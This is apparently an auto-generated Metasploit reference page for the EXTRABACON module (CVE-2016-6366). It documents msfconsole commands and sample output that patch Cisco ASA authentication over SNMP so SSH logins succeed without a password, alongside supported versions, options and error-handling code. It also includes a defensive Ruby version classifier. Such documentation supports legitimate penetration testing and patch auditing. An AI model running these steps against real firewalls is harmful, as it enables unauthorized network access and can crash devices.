Cisco ASA Authentication Bypass (EXTRABACON) - Metasploit


This page contains detailed information about how to use the auxiliary/admin/networking/cisco_asa_extrabacon metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cisco ASA Authentication Bypass (EXTRABACON)
Module: auxiliary/admin/networking/cisco_asa_extrabacon
Source code: modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb
Disclosure date: -
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 161
List of CVEs: CVE-2016-6366

This module is also known as EXTRABACON.

This module patches the authentication functions of a Cisco ASA to allow uncredentialed logins. Uses improved shellcode for payload.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/admin/networking/cisco_asa_extrabacon
msf auxiliary(cisco_asa_extrabacon) > show targets
    ... a list of targets ...
msf auxiliary(cisco_asa_extrabacon) > set TARGET target-id
msf auxiliary(cisco_asa_extrabacon) > show options
    ... show and set options ...
msf auxiliary(cisco_asa_extrabacon) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


General notes

This module uses improved shellcode with fewer stages than the Equation Group version, which makes it more reliable and makes the SNMP payload packet about 150 bytes smaller. Also, the leaked version only supports 8.x; we have it working on 9.x versions.

More details, instructions for adding version-specific offsets, and a Lina file offset finder are available at:

https://github.com/RiskSense-Ops/CVE-2016-6366

Partial list of supported versions


All of the leaked versions are available in the module:

  • 8.x
  • 8.0(2)
  • 8.0(3)
  • 8.0(3)6
  • 8.0(4)
  • 8.0(4)32
  • 8.0(5)
  • 8.2(1)
  • 8.2(2)
  • 8.2(3)
  • 8.2(4)
  • 8.2(5)
  • 8.2(5)33 *
  • 8.2(5)41 *
  • 8.3(1)
  • 8.3(2)
  • 8.3(2)39 *
  • 8.3(2)40 *
  • 8.3(2)-npe * **
  • 8.4(1)
  • 8.4(2)
  • 8.4(3)
  • 8.4(4)
  • 8.4(4)1 *
  • 8.4(4)3 *
  • 8.4(4)5 *
  • 8.4(4)9 *
  • 8.4(6)5 *
  • 8.4(7) *
  • 9.x
  • 9.0(1) *
  • 9.1(1)4 *
  • 9.2(1) *
  • 9.2(2)8 *
  • 9.2(3) *
  • 9.2(4) *
  • 9.2(4)13 *
  • * New version support, not part of the original Shadow Brokers leak.

  ** We currently can't distinguish between normal and NPE (No Payload Encryption) versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it exists for export to places where encryption is restricted), but in the future we'd like to incorporate these versions. Perhaps as a bool option?
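As an added example (not the module's code), the following Ruby mirrors the version check described on this page: it parses an SNMP sysDescr string, looks the version up in the table the module ships offsets for, and carries the NPE caveat, so a defender can classify their own ASA inventory from an SNMP walk. The sysDescr format and all sample strings are constructed assumptions.

```ruby
# Versions the module has offsets for (the ASAVER accepted list on this page).
SUPPORTED_VERSIONS = %w[
  8.0(2) 8.0(3) 8.0(3)6 8.0(4) 8.0(4)32 8.0(5)
  8.2(1) 8.2(2) 8.2(3) 8.2(4) 8.2(5) 8.2(5)33 8.2(5)41
  8.3(1) 8.3(2) 8.3(2)39 8.3(2)40
  8.4(1) 8.4(2) 8.4(3) 8.4(4) 8.4(4)1 8.4(4)3 8.4(4)5 8.4(4)9 8.4(6)5 8.4(7)
  9.0(1) 9.1(1)4 9.2(1) 9.2(2)8 9.2(3) 9.2(4) 9.2(4)13
].freeze

# Versions whose NPE (No Payload Encryption) build needs different offsets;
# sysDescr does not reveal NPE, so the result is flagged as ambiguous.
NPE_AMBIGUOUS = %w[8.3(2)].freeze

# Extract an "8.2(5)33"-style version from a sysDescr string; nil if absent.
# Assumption: sysDescr reads "Cisco Adaptive Security Appliance Version X".
def parse_asa_version(sys_descr)
  m = sys_descr.match(/Version (\d+\.\d+\(\d+\)\d*)/)
  m && m[1]
end

# Classify like the module's check method:
#   :unknown  - no version string could be parsed
#   :appears  - offsets exist for this version
#   :detected - ASA version seen, but no offsets in the table
# Returns [code, version, note].
def classify_asa(sys_descr)
  vers = parse_asa_version(sys_descr)
  return [:unknown, nil, 'Unable to retrieve version information'] unless vers

  if SUPPORTED_VERSIONS.include?(vers)
    note = NPE_AMBIGUOUS.include?(vers) ? 'NPE build cannot be told apart from SNMP strings' : nil
    [:appears, vers, note]
  else
    [:detected, vers, "no payload available for #{vers}"]
  end
end

# Constructed sample sysDescr values (not captured from real devices).
SAMPLES = [
  'Cisco Adaptive Security Appliance Version 8.2(1)',
  'Cisco Adaptive Security Appliance Version 9.2(4)13',
  'Cisco Adaptive Security Appliance Version 9.4(1)',
  'Linux host 4.4.0 #1 SMP'
].freeze

SAMPLES.each { |s| p classify_asa(s) } if $PROGRAM_NAME == __FILE__
```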

Verification Steps


  • Start msfconsole
  • use auxiliary/admin/networking/cisco_asa_extrabacon
  • set RHOST x.x.x.x
  • check
  • run
  • ssh <user>@x.x.x.x, you will not need a valid password
  • set MODE pass-enable
  • run
  • ssh <user>@x.x.x.x, ensure fake password does not work

Scenarios


Checking for a vulnerable version

msf > use auxiliary/admin/networking/cisco_asa_extrabacon
msf auxiliary(cisco_asa_extrabacon) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf auxiliary(cisco_asa_extrabacon) > check

[+] Payload for Cisco ASA version 8.2(1) available!
[*] 192.168.1.1:161 The target appears to be vulnerable.


Disabling administrative password

msf auxiliary(cisco_asa_extrabacon) > set
set ACTION            set ConsoleLogging    set Prompt            set RHOST             set TimestampOutput
set CHOST             set LogLevel          set PromptChar        set RPORT             set VERBOSE
set COMMUNITY         set MODE              set PromptTimeFormat  set SessionLogging    set VERSION
set CPORT             set MinimumRank       set RETRIES           set TIMEOUT           set WORKSPACE
msf auxiliary(cisco_asa_extrabacon) > set MODE pass-
set MODE pass-disable  set MODE pass-enable
msf auxiliary(cisco_asa_extrabacon) > set MODE pass-disable
MODE => pass-disable
msf auxiliary(cisco_asa_extrabacon) > run

[*] Building pass-disable payload for version 8.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[!] Don't forget to run pass-enable after logging in!
[*] Auxiliary module execution completed


Re-enabling administrative password

msf auxiliary(cisco_asa_extrabacon) > set MODE pass-enable
MODE => pass-enable
msf auxiliary(cisco_asa_extrabacon) > run

[*] Building pass-enable payload for version 8.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[*] Auxiliary module execution completed


Msfconsole Usage


Here is how the admin/networking/cisco_asa_extrabacon auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/networking/cisco_asa_extrabacon

msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show info

       Name: Cisco ASA Authentication Bypass (EXTRABACON)
     Module: auxiliary/admin/networking/cisco_asa_extrabacon
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Sean Dillon <[email protected]>
  Zachary Harding <[email protected]>
  Nate Caroe <[email protected]>
  Dylan Davis <[email protected]>
  William Webb <[email protected]>
  Jeff Jarmoc <jjarmoc>
  Equation Group
  Shadow Brokers

Available actions:
  Name          Description
  ----          -----------
  PASS_DISABLE  Disable password authentication.
  PASS_ENABLE   Enable password authentication.

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  ASAVER     auto             no        Target ASA version (default autodetect) (Accepted: auto, 9.2(4)13, 9.2(4), 9.2(3), 9.2(2)8, 9.2(1), 9.1(1)4, 9.0(1), 8.4(7), 8.4(6)5, 8.4(4)9, 8.4(4)5, 8.4(4)3, 8.4(4)1, 8.4(4), 8.4(3), 8.4(2), 8.4(1), 8
                                        .3(2)40, 8.3(2)39, 8.3(2), 8.3(1), 8.2(5)41, 8.2(5)33, 8.2(5), 8.2(4), 8.2(3), 8.2(2), 8.2(1), 8.0(5), 8.0(4)32, 8.0(4), 8.0(3)6, 8.0(3), 8.0(2))
  COMMUNITY  public           yes       SNMP Community String
  RETRIES    1                yes       SNMP Retries
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      161              yes       The target port (UDP)
  TIMEOUT    1                yes       SNMP Timeout

Description:
  This module patches the authentication functions of a Cisco ASA to 
  allow uncredentialed logins. Uses improved shellcode for payload.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2016-6366
  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
  https://github.com/RiskSense-Ops/CVE-2016-6366

Also known as:
  EXTRABACON

Module Options


This is a complete list of options available in the admin/networking/cisco_asa_extrabacon auxiliary module:

msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show options

Module options (auxiliary/admin/networking/cisco_asa_extrabacon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   ASAVER     auto             no        Target ASA version (default autodetect) (Accepted: auto, 9.2(4)13, 9.2(4), 9.2(3), 9.2(2)8, 9.2(1), 9.1(1)4, 9.0(1), 8.4(7), 8.4(6)5, 8.4(4)9, 8.4(4)5, 8.4(4)3, 8.4(4)1, 8.4(4), 8.4(3), 8.4(2), 8.4(1),
                                         8.3(2)40, 8.3(2)39, 8.3(2), 8.3(1), 8.2(5)41, 8.2(5)33, 8.2(5), 8.2(4), 8.2(3), 8.2(2), 8.2(1), 8.0(5), 8.0(4)32, 8.0(4), 8.0(3)6, 8.0(3), 8.0(2))
   COMMUNITY  public           yes       SNMP Community String
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      161              yes       The target port (UDP)
   TIMEOUT    1                yes       SNMP Timeout

Auxiliary action:

   Name          Description
   ----          -----------
   PASS_DISABLE  Disable password authentication.

Advanced Options


Here is a complete list of advanced options supported by the admin/networking/cisco_asa_extrabacon auxiliary module:

msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show advanced

Module advanced options (auxiliary/admin/networking/cisco_asa_extrabacon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CHOST                       no        The local client address
   CPORT                       no        The local client port
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/networking/cisco_asa_extrabacon module can do:

msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show actions

Auxiliary actions:

   Name          Description
   ----          -----------
   PASS_DISABLE  Disable password authentication.
   PASS_ENABLE   Enable password authentication.

Evasion Options


Here is the full list of possible evasion options supported by the admin/networking/cisco_asa_extrabacon auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often help in identifying the root cause of the problem.

Error: Unable to retrieve version information


Here is a relevant code snippet related to the "Error: Unable to retrieve version information" error message:

  def check
    begin
      vers_string = retrieve_asa_version
    rescue ::StandardError
      print_error('Error: Unable to retrieve version information')
      return Exploit::CheckCode::Unknown
    end

    if @offsets[vers_string]
      print_good("Payload for Cisco ASA version #{vers_string} available!")

Received Cisco ASA version <VERS_STRING>, but no payload available


Here is a relevant code snippet related to the "Received Cisco ASA version <VERS_STRING>, but no payload available" error message:

    if @offsets[vers_string]
      print_good("Payload for Cisco ASA version #{vers_string} available!")
      return Exploit::CheckCode::Appears
    end

    print_warning("Received Cisco ASA version #{vers_string}, but no payload available")
    return Exploit::CheckCode::Detected
  end

  def build_payload(vers_string, mode)
    # adds offsets to the improved shellcode

Don't forget to run PASS_ENABLE after logging in!


Here is a relevant code snippet related to the "Don't forget to run PASS_ENABLE after logging in!" error message:

    response = snmp.get_bulk(0, 1, [SNMP::VarBind.new(payload)])

    if response.varbind_list
      print_good('Clean return detected!')
      if action.name == 'PASS_DISABLE'
        print_warning("Don't forget to run PASS_ENABLE after logging in!")
        print_warning('  set ACTION PASS_ENABLE')
      end
    end
  rescue ::Rex::ConnectionError
    print_error('Connection Error: Is the target up?')

set ACTION PASS_ENABLE


Here is a relevant code snippet related to the "set ACTION PASS_ENABLE" error message:

    if response.varbind_list
      print_good('Clean return detected!')
      if action.name == 'PASS_DISABLE'
        print_warning("Don't forget to run PASS_ENABLE after logging in!")
        print_warning('  set ACTION PASS_ENABLE')
      end
    end
  rescue ::Rex::ConnectionError
    print_error('Connection Error: Is the target up?')
  rescue ::SNMP::RequestTimeout

Connection Error: Is the target up?


Here is a relevant code snippet related to the "Connection Error: Is the target up?" error message:

        print_warning("Don't forget to run PASS_ENABLE after logging in!")
        print_warning('  set ACTION PASS_ENABLE')
      end
    end
  rescue ::Rex::ConnectionError
    print_error('Connection Error: Is the target up?')
  rescue ::SNMP::RequestTimeout
    print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
  rescue ::SNMP::UnsupportedVersion
    print_error('SNMP Error: Version 2c is not supported by target.')
  rescue ::NoMethodError

SNMP Error: Request Timeout, Cisco ASA may have crashed :/


Here is a relevant code snippet related to the "SNMP Error: Request Timeout, Cisco ASA may have crashed :/" error message:

      end
    end
  rescue ::Rex::ConnectionError
    print_error('Connection Error: Is the target up?')
  rescue ::SNMP::RequestTimeout
    print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
  rescue ::SNMP::UnsupportedVersion
    print_error('SNMP Error: Version 2c is not supported by target.')
  rescue ::NoMethodError
    print_error("Error: No payload available for version #{vers_string}")
  rescue ::Interrupt

SNMP Error: Version 2c is not supported by target.


Here is a relevant code snippet related to the "SNMP Error: Version 2c is not supported by target." error message:

  rescue ::Rex::ConnectionError
    print_error('Connection Error: Is the target up?')
  rescue ::SNMP::RequestTimeout
    print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
  rescue ::SNMP::UnsupportedVersion
    print_error('SNMP Error: Version 2c is not supported by target.')
  rescue ::NoMethodError
    print_error("Error: No payload available for version #{vers_string}")
  rescue ::Interrupt
    raise $ERROR_INFO
  rescue ::StandardError => e

Error: No payload available for version <VERS_STRING>


Here is a relevant code snippet related to the "Error: No payload available for version <VERS_STRING>" error message:

  rescue ::SNMP::RequestTimeout
    print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
  rescue ::SNMP::UnsupportedVersion
    print_error('SNMP Error: Version 2c is not supported by target.')
  rescue ::NoMethodError
    print_error("Error: No payload available for version #{vers_string}")
  rescue ::Interrupt
    raise $ERROR_INFO
  rescue ::StandardError => e
    print_error("Error: #{e.class} #{e} #{e.backtrace}")
  ensure

Error: <E.CLASS> <E> <E.BACKTRACE>


Here is a relevant code snippet related to the "Error: <E.CLASS> <E> <E.BACKTRACE>" error message:

  rescue ::NoMethodError
    print_error("Error: No payload available for version #{vers_string}")
  rescue ::Interrupt
    raise $ERROR_INFO
  rescue ::StandardError => e
    print_error("Error: #{e.class} #{e} #{e.backtrace}")
  ensure
    disconnect_snmp
  end

  def retrieve_asa_version

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
